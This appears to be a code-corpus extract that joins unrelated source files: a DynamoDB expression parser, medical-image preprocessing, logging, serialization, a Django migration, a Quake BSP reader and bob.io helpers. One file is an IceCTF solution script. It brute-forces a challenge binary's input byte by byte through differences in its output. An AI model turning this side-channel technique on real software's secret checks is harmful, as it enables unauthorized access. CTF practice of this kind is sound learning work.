Callable[[DynamoItem], bool] = super().parse( CeLexer().tokenize(expression) ) def truthy(item: DynamoItem) -> bool: item = _TYPE_DESERIALIZER.deserialize(item) return compiled_expression(item) self._expression_cache[expression_hash] = lambda m: truthy(m) return self._expression_cache[expression_hash] # Get the token list from the lexer (required) tokens = CeLexer.tokens precedence = ( ("left", OR), ("left", AND), ("right", NOT), ("right", PARENS), ("left", ATTRIBUTE_EXISTS, ATTRIBUTE_NOT_EXISTS, BEGINS_WITH, CONTAINS), ("left", BETWEEN), ("left", IN), ("left", EQ, NE, LT, LTE, GT, GTE), ) # Grammar rules and actions @_("operand EQ operand") def condition(self, p): operand0 = p.operand0 operand1 = p.operand1 return lambda m: operand0(m) == operand1(m) @_("operand NE operand") def condition(self, p): operand0 = p.operand0 operand1 = p.operand1 return lambda m: operand0(m) != operand1(m) @_("operand GT operand") def condition(self, p): operand0 = p.operand0 operand1 = p.operand1 return lambda m: operand0(m) > operand1(m) @_("operand GTE operand") def condition(self, p): operand0 = p.operand0 operand1 = p.operand1 return lambda m: operand0(m) >= operand1(m) @_("operand LT operand") def condition(self, p): operand0 = p.operand0 operand1 = p.operand1 return lambda m: operand0(m) < operand1(m) @_("operand LTE operand") def condition(self, p): operand0 = p.operand0 operand1 = p.operand1 return lambda m: operand0(m) <= operand1(m) @_("operand BETWEEN operand AND operand") def condition(self, p): operand0 = p.operand0 operand1 = p.operand1 operand2 = p.operand2 return lambda m: operand1(m) <= operand0(m) <= operand2(m) @_('operand IN "(" in_list ")"') def condition(self, p): operand = p.operand in_list = p.in_list return lambda m: operand(m) in in_list(m) @_("function") def condition(self, p): function = p.function return lambda m: function(m) @_("condition AND condition") def condition(self, p): condition0 = p.condition0 condition1 = p.condition1 return lambda m: condition0(m) and condition1(m) @_("condition OR condition") def condition(self, p): condition0 = p.condition0 condition1 = p.condition1 return lambda m: condition0(m) or condition1(m) @_("NOT condition") def condition(self, p): condition = p.condition return lambda m: not condition(m) @_('"(" condition ")" %prec PARENS') def condition(self, p): condition = p.condition return lambda m: condition(m) @_('ATTRIBUTE_EXISTS "(" path ")"') def function(self, p): path = p.path return lambda m: path(m) is not None @_('ATTRIBUTE_NOT_EXISTS "(" path ")"') def function(self, p): path = p.path return lambda m: path(m) is None @_('ATTRIBUTE_TYPE "(" path "," operand ")"') def function(self, p): path = p.path operand = p.operand return lambda m: list(_TYPE_SERIALIZER.serialize(path(m)))[0] == operand(m) @_('BEGINS_WITH "(" path "," operand ")"') def function(self, p): path = p.path operand = p.operand return ( lambda m: path(m).startswith(operand(m)) if isinstance(path(m), str) else False ) @_('CONTAINS "(" path "," operand ")"') def function(self, p): path = p.path operand = p.operand return ( lambda m: operand(m) in path(m) if isinstance(path(m), (str, set)) else False ) @_('SIZE "(" path ")"') def operand(self, p): path = p.path return ( lambda m: len(path(m)) if isinstance(path(m), (str, set, dict, bytearray, bytes, list)) else -1 ) @_('in_list "," operand') def in_list(self, p): in_list = p.in_list operand = p.operand return lambda m: [*in_list(m), operand(m)] @_('operand "," operand') def in_list(self, p): operand0 = p.operand0 operand1 = 
p.operand1 return lambda m: [operand0(m), operand1(m)] @_("path") def operand(self, p): return p.path @_("VALUE") def operand(self, p): VALUE = p.VALUE expression_attribute_values = self._expression_attribute_values return lambda m: expression_attribute_values.get(VALUE) @_('path "." NAME') def path(self, p): path = p.path NAME = p.NAME return lambda m: path(m).get(NAME) if path(m) else None @_('path "." NAME_REF') def path(self, p): path = p.path NAME_REF = p.NAME_REF expression_attribute_names = self._expression_attribute_names return ( lambda m: path(m).get(expression_attribute_names.get(NAME_REF)) if path(m) else None ) @_('path "[" INDEX "]"') def path(self, p): path = p.path INDEX = p.INDEX return ( lambda m: path(m)[INDEX] if isinstance(path(m), list) and len(path(m)) > INDEX else None ) @_("NAME") def path(self, p): NAME = p.NAME return lambda m: m.get(NAME) @_("NAME_REF") def path(self, p): NAME_REF = p.NAME_REF expression_attribute_names = self._expression_attribute_names return lambda m: m.get(expression_attribute_names.get(NAME_REF))
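A hedged usage sketch for the condition-expression parser above, assuming the class is importable as shown; the expression, attribute values, and item are invented for illustration.

from dynamodb_ce.ceparser import CeParser   # import path assumed from the file location above

parser = CeParser(expression_attribute_values={":min_age": {"N": "21"}})
item = {"age": {"N": "30"}, "name": {"S": "Ada"}}   # DynamoDB-typed item

# evaluate() compiles the expression (cached per expression/attribute hash)
# and applies it to the deserialized item.
print(parser.evaluate("age >= :min_age", item))   # expected: True
print(parser.evaluate("age < :min_age", item))    # expected: False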
1.210938
1
LittleBigCode/code/ppc.py
ElodieQ/EPIDEMIUM-Season-3
0
12767147
<reponame>ElodieQ/EPIDEMIUM-Season-3 """ Preprocessing related functions """ import os import pandas as pd from PIL import Image from pathlib import Path import datetime import numpy as np import cv2 import matplotlib.pyplot as plt import itertools from sklearn.model_selection import train_test_split from functools import partial import warnings warnings.filterwarnings('ignore') def _as_date(x): """ Helper to cast DataFrame date column """ return datetime.datetime.strptime(x, "%Y-%m-%d") def read_korl_csv(path): """ Read the KORL csv and potentially correct stuff """ df = pd.read_csv(path) df['computed_os'] = df.apply(lambda row: \ (_as_date(row['Date_derniere_nouvelles']) - _as_date(row['Date_biopsie'])).days / 30., axis=1) return df def _get_id(x): """ Get patient ID from image file path """ return str(x).split(os.sep)[-1].split('_')[0] def get_id2f(markers_dpath): """ Find all images' paths for each patient """ id2f = {} for i, dpath in enumerate(markers_dpath): fpaths = list(dpath.iterdir()) for path in fpaths: _id = _get_id(path) if _id in id2f: id2f[_id].append(str(path)) else: id2f[_id] = [str(path)] return id2f def get_all_combinations(fpaths): """ Produce all possible combinations of images for each patient, following the rule of 1 image per marker for each patient. """ subsets = [] for subset in itertools.combinations(fpaths, 6): skip = False markers = set(int(e.split('marker')[1].split(os.sep)[0]) for e in subset) for i in range(1, 7): if i not in markers: skip = True break if skip: continue subsets.append(tuple(sorted(subset))) return set(subsets) def prepare_target(x): """ Encode the OS into 3 categories """ if x <= 24: return 0 elif x <= 72: return 1 else: return 2 def prepare_dataset(db_path, id2f, is_train=True): """ Read KORL csv files and produce the dataset : one sample contains 1 image of each marker for each patient. The dataset contains all combinations for each patient. Parameters -------- db_path: str Path of the 'data/' directory id2f: dict Patient ID to list of images' paths dictionary is_train: bool Whether we expect a target column or not Returns -------- df_full: pandas DataFrame Dataset """ # Read csv df = read_korl_csv(db_path) ids = set(df['Patient_ID'].values.tolist()) if is_train: id2os = {k: v for k, v in df[['Patient_ID', 'OS']].values.tolist()} else: df.iloc[0,0] = "905e61" # Error in data # Get usable dataframe df_full = pd.DataFrame() for patient, fpaths in id2f.items(): if patient not in ids: continue combinations = get_all_combinations(fpaths) cur_df = pd.DataFrame([[patient] + list(tup) for tup in combinations], columns=['patient']+[f'marker{i}' for i in range(1,7)]) df_full = pd.concat([df_full, cur_df], axis=0).reset_index(drop=True) if is_train: df_full['OS'] = df_full['patient'].apply(lambda x: id2os[x]) df_full['target'] = df_full['OS'].apply(prepare_target) return df_full def _split_train_val(df, test_size=.3): """ Split the training dataframe into actual training and validation. Splitting based on patient ID Parameters -------- test_size: float [0., 1.] Part of training patients (not samples !) 
to use as validation Returns -------- df_train: pandas DataFrame Training data df_val: pandas DataFrame Validation data """ id_train, id_val = train_test_split(df['patient'].unique(), test_size=.3, random_state=42) df_train = df[df['patient'].isin(id_train)].reset_index(drop=True) df_val = df[df['patient'].isin(id_val)].reset_index(drop=True) return df_train, df_val def get_train_val_test_dfs(val_size=.3): """ Gather the training and test data without loading images + create a validation set based on the training data. Parameters -------- val_size: float [0., 1.] Part of training patients (not samples !) to use as validation Returns -------- df_train: pandas DataFrame Training data df_val: pandas DataFrame Validation data df_test: pandas DataFrame Test data """ # Constants data_path = Path('.').resolve().parents[0].joinpath('data') train_db_path = str(data_path.joinpath('KORL_avatar_train.csv')) test_db_path = str(data_path.joinpath('KORL_avatar_test_X.csv')) markers_dpath = [data_path.joinpath(f'marker{i}') for i in range(1, 7)] # id2f = get_id2f(markers_dpath) df_train = prepare_dataset(train_db_path, id2f, is_train=True) df_train, df_val = _split_train_val(df_train, test_size=val_size) df_test = prepare_dataset(test_db_path, id2f, is_train=False) return df_train, df_val, df_test def red_count_preprocess(df, red_thresh=50): """ Produce a dataframe of size N x 6, where N is the number samples and 6 is the 6 different markers. Each value is the percentage of red pixels in each image. Parameters -------- df: pandas DataFrame Dataset with unloaded images, contains the images' paths for each sample red_thresh: int [0,255] Value above which the pixel is considered red Returns -------- df : pandas Dataframe Datframe with 6 columns ( 'marker_1', ..., 'marker_6) """ img2red = {} # Function for each row def _df_to_img(row): img = [] for i in range(1, 7): fpath = row[f"marker{i}"] if fpath in img2red: img.append(img2red[fpath]) else: tmp = cv2.imread(row[f"marker{i}"])[:,:,0] tmp[tmp[:,:]<red_thresh] = 0 tmp[tmp[:,:]>0] = 1 res = np.sum(tmp) / (1404*1872) img.append(res) img2red[fpath] = res return img X = np.array(df.apply(_df_to_img, axis=1).values.tolist()) df = pd.DataFrame( X, columns = ['marker_{}'.format(i) for i in range(1, 7)], index = df['patient']) return df def preprocess_KORL (features, db_path ) : """ Produce a dataframe of size N_patient x features, where N is of patient in the clinical data. image. Parameters -------- features: list List of columns of the clinical data to keep db_path : string Path of the clinical data Returns -------- df : panda dataframe Datframe with len(features) columns """ #Read and preprocess data df = pd.read_csv(db_path) df = df.set_index("Patient_ID") df['N'] = df['N'].replace(to_replace=r'^2[a,b,c]', value='2', regex=True).astype(int) df['Age_diag'] = round(df['Age_diag']/10).astype(int) return df[features] def full_preprocess(features, db_path, df, red_thresh= 50 ) : """ Produce a dataframe of size N x 6 + len(features), where N is the number samples, 6 is the 6 different markers. Each value for the market is the percentage of red and there is also the clinical data. image. 
Parameters -------- features: list List of columns of the clinical data to keep df_path : string Path of the clinical csv data df: pandas DataFrame Dataset with unloaded images, contains the images' paths for each sample red_thresh: int [0,255] Value above which the pixel is considered red Returns -------- df_final : pandas dataframe Datframe with the 6 columns ( 'marker_1', ..., 'marker_6) and the features columns from the clinical data """ df_images = red_count_preprocess(df, red_thresh) df_clinical = preprocess_KORL(features, db_path) df_final = pd.merge(df_images, df_clinical, left_index= True, right_index= True, how = 'inner') return df_final
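A quick check of the survival-time bucketing applied by prepare_target above (overall survival in months mapped to three classes); the function body is repeated here only so the snippet runs on its own.

def prepare_target(x):
    # 0: OS <= 24 months, 1: 24 < OS <= 72 months, 2: OS > 72 months
    if x <= 24:
        return 0
    elif x <= 72:
        return 1
    else:
        return 2

print([prepare_target(os_months) for os_months in (12, 24, 48, 72, 100)])   # [0, 0, 1, 1, 2]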
2.078125
2
2016_IceCTF/a_strong_feeling_for_bruteforcing.py
kenoph/WriteUps
2
12767275
<gh_stars>1-10
#!/usr/bin/env python3

import subprocess


def run(txt):
    return subprocess.run('./a_strong_feeling', input=txt, stdout=subprocess.PIPE).stdout


if __name__ == '__main__':
    key = b''

    for n in range(500):
        res = dict()

        for l in range(1, 128):
            curr = key + bytes([l])
            out = run(curr)

            if out not in res:
                res[out] = curr
            else:
                del res[out]

        key = list(res.values())[0]

        if key[-1] == 0x7F:
            key = key[:-1]
            break

    print(key)
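The loop above relies on the challenge binary producing a distinct output only for the guess whose last byte is correct. A small simulated oracle (a stand-in for ./a_strong_feeling, which is not reproduced here, with a fake flag) shows the per-character recovery idea without the binary.

SECRET = b'IceCTF{fake}'   # hypothetical flag, only for the simulation

def run(txt):
    # Stand-in oracle: output depends only on how many leading bytes of the guess match.
    matching = 0
    for a, b in zip(txt, SECRET):
        if a != b:
            break
        matching += 1
    return b'wrong ' + bytes([matching])

key = b''
for _ in range(len(SECRET)):
    outputs = {}
    for c in range(1, 128):
        outputs.setdefault(run(key + bytes([c])), []).append(c)
    # the correct byte is the one whose output no other candidate shares
    unique = [cs[0] for cs in outputs.values() if len(cs) == 1]
    key += bytes([unique[0]])
print(key)   # b'IceCTF{fake}'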
1.757813
2
test/functional/test-framework/log/base_log.py
josehu07/open-cas-linux-mf
2
12767403
<gh_stars>1-10
#
# Copyright(c) 2019-2020 Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause-Clear
#

from enum import Enum
from re import sub


class BaseLogResult(Enum):
    DEBUG = 10
    PASSED = 11
    WORKAROUND = 12
    WARNING = 13
    SKIPPED = 14
    FAILED = 15
    EXCEPTION = 16
    BLOCKED = 17
    CRITICAL = 18


def escape(msg):
    return sub(u'[^\u0020-\uD7FF\u0009\u000A\u000D\uE000-\uFFFD\U00010000-\U0010FFFF]+', '', msg)


class BaseLog():
    def __init__(self, begin_message=None):
        self.__begin_msg = begin_message
        self.__result = BaseLogResult.PASSED

    def __enter__(self):
        if self.__begin_msg is not None:
            self.begin(self.__begin_msg)
        else:
            self.begin("Start BaseLog ...")

    def __exit__(self, *args):
        self.end()

    def __try_to_set_new_result(self, new_result):
        if new_result.value > self.__result.value:
            self.__result = new_result

    def begin(self, message):
        pass

    def debug(self, message):
        pass

    def info(self, message):
        pass

    def workaround(self, message):
        self.__try_to_set_new_result(BaseLogResult.WORKAROUND)

    def warning(self, message):
        self.__try_to_set_new_result(BaseLogResult.WARNING)

    def skip(self, message):
        self.__try_to_set_new_result(BaseLogResult.SKIPPED)

    def error(self, message):
        self.__try_to_set_new_result(BaseLogResult.FAILED)

    def blocked(self, message):
        self.__try_to_set_new_result(BaseLogResult.BLOCKED)

    def exception(self, message):
        self.__try_to_set_new_result(BaseLogResult.EXCEPTION)

    def critical(self, message):
        self.__try_to_set_new_result(BaseLogResult.CRITICAL)

    def end(self):
        return self.__result

    def get_result(self):
        return self.__result
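A small sketch of how the result aggregation above behaves: the worst result reported during a block wins, and get_result() returns it. PrintLog is a hypothetical subclass, and the import path is assumed from the file location above.

from log.base_log import BaseLog, BaseLogResult   # assumed import path

class PrintLog(BaseLog):
    # minimal concrete log that also prints messages
    def info(self, message):
        print('[info]', message)

    def error(self, message):
        print('[error]', message)
        super().error(message)

log = PrintLog("start demo")
with log:                        # __enter__ calls begin(), __exit__ calls end()
    log.info("step one ok")
    log.error("step two failed")
print(log.get_result())          # BaseLogResult.FAILED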
1.984375
2
ingestion/src/metadata/ingestion/models/json_serializable.py
rongfengliang/OpenMetadata
0
12767531
#  Licensed to the Apache Software Foundation (ASF) under one or more
#  contributor license agreements. See the NOTICE file distributed with
#  this work for additional information regarding copyright ownership.
#  The ASF licenses this file to You under the Apache License, Version 2.0
#  (the "License"); you may not use this file except in compliance with
#  the License. You may obtain a copy of the License at
#
#  http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.

import abc
import json

NODE_KEY = "KEY"
NODE_LABEL = "LABEL"
NODE_REQUIRED_HEADERS = {NODE_LABEL, NODE_KEY}


class JsonSerializable(object, metaclass=abc.ABCMeta):
    def __init__(self) -> None:
        pass

    @staticmethod
    def snake_to_camel(s):
        a = s.split("_")
        a[0] = a[0].lower()
        if len(a) > 1:
            a[1:] = [u.title() for u in a[1:]]
        return "".join(a)

    @staticmethod
    def serialize(obj):
        return {JsonSerializable.snake_to_camel(k): v for k, v in obj.__dict__.items()}

    def to_json(self):
        return json.dumps(
            JsonSerializable.serialize(self),
            indent=4,
            default=JsonSerializable.serialize,
        )
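A usage sketch for the mixin above: attribute names are converted from snake_case to camelCase when serializing. TableEntity is a hypothetical subclass, used only to show the conversion, and the import path is assumed from the file location above.

from metadata.ingestion.models.json_serializable import JsonSerializable   # assumed import path

class TableEntity(JsonSerializable):
    def __init__(self, table_name, column_count):
        self.table_name = table_name
        self.column_count = column_count

print(JsonSerializable.snake_to_camel("database_service_name"))   # databaseServiceName
entity = TableEntity("orders", 12)
print(entity.to_json())   # pretty-printed JSON with keys tableName / columnCount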
1.773438
2
inventory/migrations/0002_auto_20200919_1121.py
Kgford/TCLI
0
12767659
<filename>inventory/migrations/0002_auto_20200919_1121.py
# Generated by Django 3.0.8 on 2020-09-19 15:21

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('inventory', '0001_initial'),
    ]

    operations = [
        migrations.RemoveField(model_name='inventory', name='quantity'),
        migrations.RemoveField(model_name='inventory', name='recieved_date'),
        migrations.RemoveField(model_name='inventory', name='shipped_date'),
        migrations.AddField(
            model_name='events', name='rtv',
            field=models.CharField(default='N/A', max_length=20, verbose_name='Item Serial number'),
        ),
        migrations.AlterField(
            model_name='inventory', name='category',
            field=models.CharField(default='N/A', max_length=50, null=True, verbose_name='category'),
        ),
        migrations.AlterField(
            model_name='inventory', name='description',
            field=models.CharField(default='N/A', max_length=200, null=True, verbose_name='description'),
        ),
        migrations.AlterField(
            model_name='inventory', name='modelname',
            field=models.CharField(default='N/A', max_length=50, null=True, verbose_name='modelname'),
        ),
        migrations.AlterField(
            model_name='inventory', name='serial_number',
            field=models.CharField(default='N/A', max_length=50, null=True, verbose_name='serial number'),
        ),
        migrations.AlterField(
            model_name='inventory', name='shelf',
            field=models.CharField(default='N/A', max_length=10, null=True, verbose_name='shelf'),
        ),
        migrations.AlterField(
            model_name='inventory', name='status',
            field=models.CharField(default='N/A', max_length=50, null=True, verbose_name='status'),
        ),
    ]
0.566406
1
qcli/bsp2svg/api.py
LaudateCorpus1/quake-cli-tools
42
12767787
<filename>qcli/bsp2svg/api.py<gh_stars>10-100 from collections import namedtuple from functools import lru_cache from vgio.quake import bsp def dot(v0, v1): return v0[0] * v1[0] + v0[1] * v1[1] + v0[2] * v1[2] def cross(v0, v1): return v0[1] * v1[2] - v0[2] * v1[1], \ v0[2] * v1[0] - v0[0] * v1[2], \ v0[0] * v1[1] - v0[1] * v1[0] def subtract(v0, v1): return v0[0] - v1[0], v0[1] - v1[1], v0[2] - v1[2] __all__ = ['Bsp'] class Bsp(object): __slots__ = ( 'models' ) def __init__(self, models): self.models = models @staticmethod def open(file): bsp_file = bsp.Bsp.open(file) bsp_file.close() def get_models(): return [process_model(m) for m in bsp_file.models] def process_model(bsp_model): faces = get_faces(bsp_model) return Model(faces) def get_faces(bsp_model): start = bsp_model.first_face stop = start + bsp_model.number_of_faces face_range = range(start, stop) return [process_face(f) for f in face_range] @lru_cache(maxsize=None) def process_face(face_index): edges = get_edges(face_index) vertexes = get_vertexes(face_index) uvs = []#get_uvs(face_index) plane = get_plane(face_index) texture_name = get_texture_name(face_index) return Face(vertexes, edges, uvs, plane, texture_name) @lru_cache(maxsize=None) def get_edges(face_index): bsp_face = bsp_file.faces[face_index] start = bsp_face.first_edge stop = start + bsp_face.number_of_edges es = bsp_file.surf_edges[start:stop] result = [] for e in es: v = bsp_file.edges[abs(e)].vertexes if e < 0: v = list(reversed(v)) v0 = process_vertex(v[0]) v1 = process_vertex(v[1]) result.append(Edge(v0, v1)) return result @lru_cache(maxsize=None) def get_vertexes(face_index): edges = get_edges(face_index) return [e.vertex_0 for e in edges] @lru_cache(maxsize=None) def process_vertex(index): bsp_vertex = bsp_file.vertexes[index] return Vertex(*bsp_vertex[:]) @lru_cache(maxsize=None) def get_texture_name(face_index): if face_index == -1: return '' bsp_face = bsp_file.faces[face_index] if bsp_face.texture_info == -1: return '' tex_info = bsp_file.texture_infos[bsp_face.texture_info] miptex = bsp_file.miptextures[tex_info.miptexture_number] if not miptex: return '' return miptex.name @lru_cache(maxsize=None) def get_uvs(face_index): bsp_face = bsp_file.faces[face_index] vertexes = get_vertexes(face_index) texture_info = bsp_file.texture_infos[bsp_face.texture_info] miptex = bsp_file.miptextures[texture_info.miptexture_number] s = texture_info.s ds = texture_info.s_offset t = texture_info.t dt = texture_info.t_offset w = miptex.width h = miptex.height uvs = [] for v in vertexes: v = v[:] uv = (dot(v, s) + ds) / w, -(dot(v, t) + dt) / h uvs.append(uv) return uvs @lru_cache(maxsize=None) def get_plane(face_index): bsp_face = bsp_file.faces[face_index] return bsp_file.planes[bsp_face.plane_number] models = get_models() result = Bsp(models) return result class Model(object): __slots__ = ( 'faces' ) def __init__(self, faces): self.faces = faces @property @lru_cache(maxsize=None) def vertexes(self): return list(set([v for f in self.faces for v in f.vertexes])) @property @lru_cache(maxsize=None) def edges(self): return list(set([e for f in self.faces for e in f.edges])) class Face(object): __slots__ = ( 'vertexes', 'edges', 'uvs', 'plane', 'texture_name' ) def __init__(self, vertexes, edges, uvs, plane, texture_name): self.vertexes = vertexes self.edges = edges self.uvs = uvs self.plane = plane self.texture_name = texture_name Edge = namedtuple('Edge', ['vertex_0', 'vertex_1']) class Vertex(object): __slots__ = ( 'x', 'y', 'z' ) def __init__(self, x, y, z): self.x = x self.y 
= y self.z = z def __getitem__(self, item): return [self.x, self.y, self.z][item]
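The dot/cross/subtract helpers at the top of this file operate on plain 3-tuples; a quick standalone check that mirrors those definitions.

def dot(v0, v1):
    return v0[0] * v1[0] + v0[1] * v1[1] + v0[2] * v1[2]

def cross(v0, v1):
    return (v0[1] * v1[2] - v0[2] * v1[1],
            v0[2] * v1[0] - v0[0] * v1[2],
            v0[0] * v1[1] - v0[1] * v1[0])

def subtract(v0, v1):
    return v0[0] - v1[0], v0[1] - v1[1], v0[2] - v1[2]

print(dot((1, 0, 0), (0, 1, 0)))        # 0  (perpendicular axes)
print(cross((1, 0, 0), (0, 1, 0)))      # (0, 0, 1)
print(subtract((4, 5, 6), (1, 2, 3)))   # (3, 3, 3)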
1.59375
2
bob/io/base/__init__.py
bioidiap/bob.io.base
0
12767915
# import Libraries of other lib packages import numpy import bob.core # import our own Library import bob.extension bob.extension.load_bob_library('bob.io.base', __file__) from ._library import File as _File_C, HDF5File as _HDF5File_C, extensions from . import version from .version import module as __version__ from .version import api as __api_version__ import os class File(_File_C): __doc__ = _File_C.__doc__ def __enter__(self): return self def __exit__(self, type, value, traceback): self.close() class HDF5File(_HDF5File_C): __doc__ = _HDF5File_C.__doc__ def __enter__(self): return self def __exit__(self, type, value, traceback): return self.close() def __contains__(self, x): __doc__ = self.has_key.__doc__ return self.has_key(x) def __iter__(self): __doc__ = self.keys.__doc__ return iter(self.keys()) def __getitem__(self, name): __doc__ = self.get.__doc__ return self.get(name) def __setitem__(self, name, value): __doc__ = self.set.__doc__ return self.set(name, value) def values(self): '''Yields the datasets contained in the current directory. Yields ------- object The datasets that are being read. ''' return (self[key] for key in self) def items(self): '''Yields the keys and the datasets contained in the current directory. Yields ------- tuple The key and the datasets that are being read in a tuple. ''' return ((key, self[key]) for key in self) def _is_string(s): """Returns ``True`` if the given object is a string This method can be used with Python-2.x or 3.x and returns a string respecting each environment's constraints. """ from sys import version_info return (version_info[0] < 3 and isinstance(s, (str, unicode))) or \ isinstance(s, (bytes, str)) @numpy.deprecate(new_name="os.makedirs(directory, exist_ok=True)") def create_directories_safe(directory, dryrun=False): """Creates a directory if it does not exists, with concurrent access support. This function will also create any parent directories that might be required. If the dryrun option is selected, it does not actually create the directory, but just writes the (Linux) command that would have been executed. **Parameters:** ``directory`` : str The directory that you want to create. ``dryrun`` : bool Only ``print`` the command to console, but do not execute it. """ if dryrun: print("[dry-run] mkdir -p '%s'" % directory) else: os.makedirs(directory, exist_ok=True) def load(inputs): """load(inputs) -> data Loads the contents of a file, an iterable of files, or an iterable of :py:class:`bob.io.base.File`'s into a :py:class:`numpy.ndarray`. **Parameters:** ``inputs`` : various types This might represent several different entities: 1. The name of a file (full path) from where to load the data. In this case, this assumes that the file contains an array and returns a loaded numpy ndarray. 2. An iterable of filenames to be loaded in memory. In this case, this would assume that each file contains a single 1D sample or a set of 1D samples, load them in memory and concatenate them into a single and returned 2D :py:class:`numpy.ndarray`. 3. An iterable of :py:class:`File`. In this case, this would assume that each :py:class:`File` contains a single 1D sample or a set of 1D samples, load them in memory if required and concatenate them into a single and returned 2D :py:class:`numpy.ndarray`. 4. An iterable with mixed filenames and :py:class:`File`. In this case, this would returned a 2D :py:class:`numpy.ndarray`, as described by points 2 and 3 above. **Returns:** ``data`` : :py:class:`numpy.ndarray` The data loaded from the given ``inputs``. 
""" from collections import Iterable import numpy if _is_string(inputs): if not os.path.exists(inputs): raise RuntimeError(f"`{inputs}' does not exist!") return File(inputs, 'r').read() elif isinstance(inputs, Iterable): retval = [] for obj in inputs: if _is_string(obj): retval.append(load(obj)) elif isinstance(obj, File): retval.append(obj.read()) else: raise TypeError( "Iterable contains an object which is not a filename nor a " "bob.io.base.File.") return numpy.vstack(retval) else: raise TypeError( "Unexpected input object. This function is expecting a filename, " "or an iterable of filenames and/or bob.io.base.File's") def merge(filenames): """merge(filenames) -> files Converts an iterable of filenames into an iterable over read-only :py:class:`bob.io.base.File`'s. **Parameters:** ``filenames`` : str or [str] A list of file names. This might represent: 1. A single filename. In this case, an iterable with a single :py:class:`File` is returned. 2. An iterable of filenames to be converted into an iterable of :py:class:`File`'s. **Returns:** ``files`` : [:py:class:`File`] The list of files. """ from collections import Iterable from .utils import is_string if is_string(filenames): return [File(filenames, 'r')] elif isinstance(filenames, Iterable): return [File(k, 'r') for k in filenames] else: raise TypeError( "Unexpected input object. This function is expecting an " "iterable of filenames.") def save(array, filename, create_directories=False): """Saves the contents of an array-like object to file. Effectively, this is the same as creating a :py:class:`File` object with the mode flag set to ``'w'`` (write with truncation) and calling :py:meth:`File.write` passing ``array`` as parameter. Parameters: ``array`` : array_like The array-like object to be saved on the file ``filename`` : str The name of the file where you need the contents saved to ``create_directories`` : bool Automatically generate the directories if required (defaults to ``False`` because of compatibility reasons; might change in future to default to ``True``) """ # create directory if not existent yet if create_directories: create_directories_safe(os.path.dirname(filename)) # requires data is c-contiguous and aligned, will create a copy otherwise array = numpy.require(array, requirements=('C_CONTIGUOUS', 'ALIGNED')) return File(filename, 'w').write(array) # Just to make it homogenous with the C++ API write = save read = load def append(array, filename): """append(array, filename) -> position Appends the contents of an array-like object to file. Effectively, this is the same as creating a :py:class:`File` object with the mode flag set to ``'a'`` (append) and calling :py:meth:`File.append` passing ``array`` as parameter. **Parameters:** ``array`` : array_like The array-like object to be saved on the file ``filename`` : str The name of the file where you need the contents saved to **Returns:** ``position`` : int See :py:meth:`File.append` """ # requires data is c-contiguous and aligned, will create a copy otherwise array = numpy.require(array, requirements=('C_CONTIGUOUS', 'ALIGNED')) return File(filename, 'a').append(array) def peek(filename): """peek(filename) -> dtype, shape, stride Returns the type of array (frame or sample) saved in the given file. Effectively, this is the same as creating a :py:class:`File` object with the mode flag set to `r` (read-only) and calling :py:meth:`File.describe`. 
**Parameters**: ``filename`` : str The name of the file to peek information from **Returns:** ``dtype, shape, stride`` : see :py:meth:`File.describe` """ return File(filename, 'r').describe() def peek_all(filename): """peek_all(filename) -> dtype, shape, stride Returns the type of array (for full readouts) saved in the given file. Effectively, this is the same as creating a :py:class:`File` object with the mode flag set to ``'r'`` (read-only) and returning ``File.describe`` with its parameter ``all`` set to ``True``. **Parameters:** ``filename`` : str The name of the file to peek information from **Returns:** ``dtype, shape, stride`` : see :py:meth:`File.describe` """ return File(filename, 'r').describe(all=True) # Keeps compatibility with the previously existing API open = File def get_config(): """Returns a string containing the configuration information. """ return bob.extension.get_config(__name__, version.externals, version.api) def get_include_directories(): """get_include_directories() -> includes Returns a list of include directories for dependent libraries, such as HDF5. This function is automatically used by :py:func:`bob.extension.get_bob_libraries` to retrieve the non-standard include directories that are required to use the C bindings of this library in dependent classes. You shouldn't normally need to call this function by hand. **Returns:** ``includes`` : [str] The list of non-standard include directories required to use the C bindings of this class. For now, only the directory for the HDF5 headers are returned. """ # try to use pkg_config first try: from bob.extension.utils import find_header # locate pkg-config on our own header = 'hdf5.h' candidates = find_header(header) if not candidates: raise RuntimeError( "could not find %s's `%s' - have you installed %s on this " "machine?" % ('hdf5', header, 'hdf5')) return [os.path.dirname(candidates[0])] except RuntimeError: from bob.extension import pkgconfig pkg = pkgconfig('hdf5') return pkg.include_directories() def get_macros(): """get_macros() -> macros Returns a list of preprocessor macros, such as ``(HAVE_HDF5, 1)``. This function is automatically used by :py:func:`bob.extension.get_bob_libraries` to retrieve the prerpocessor definitions that are required to use the C bindings of this library in dependent classes. You shouldn't normally need to call this function by hand. **Returns:** ``macros`` : [(str,str)] The list of preprocessor macros required to use the C bindings of this class. For now, only ``('HAVE_HDF5', '1')`` is returned, when applicable. """ # get include directories if get_include_directories(): return [('HAVE_HDF5', '1')] def _generate_features(reader, paths, same_size=False): """Load and stack features in a memory efficient way. This function is meant to be used inside :py:func:`vstack_features`. Parameters ---------- reader : ``collections.Callable`` See the documentation of :py:func:`vstack_features`. paths : ``collections.Iterable`` See the documentation of :py:func:`vstack_features`. same_size : :obj:`bool`, optional See the documentation of :py:func:`vstack_features`. Yields ------ object The first object returned is a tuple of :py:class:`numpy.dtype` of features and the shape of the first feature. The rest of objects are the actual values in features. The features are returned in C order. 
""" shape_determined = False for i, path in enumerate(paths): feature = numpy.atleast_2d(reader(path)) feature = numpy.ascontiguousarray(feature) if not shape_determined: shape_determined = True dtype = feature.dtype shape = list(feature.shape) yield (dtype, shape) else: # make sure all features have the same shape and dtype if same_size: assert shape == list(feature.shape) else: assert shape[1:] == list(feature.shape[1:]) assert dtype == feature.dtype if same_size: yield (feature.ravel(),) else: for feat in feature: yield (feat.ravel(),) def vstack_features(reader, paths, same_size=False, dtype=None): """Stacks all features in a memory efficient way. Parameters ---------- reader : ``collections.Callable`` The function to load the features. The function should only take one argument ``path`` and return loaded features. Use :any:`functools.partial` to accommodate your reader to this format. The features returned by ``reader`` are expected to have the same :py:class:`numpy.dtype` and the same shape except for their first dimension. First dimension should correspond to the number of samples. paths : ``collections.Iterable`` An iterable of paths to iterate on. Whatever is inside path is given to ``reader`` so they do not need to be necessarily paths to actual files. If ``same_size`` is ``True``, ``len(paths)`` must be valid. same_size : 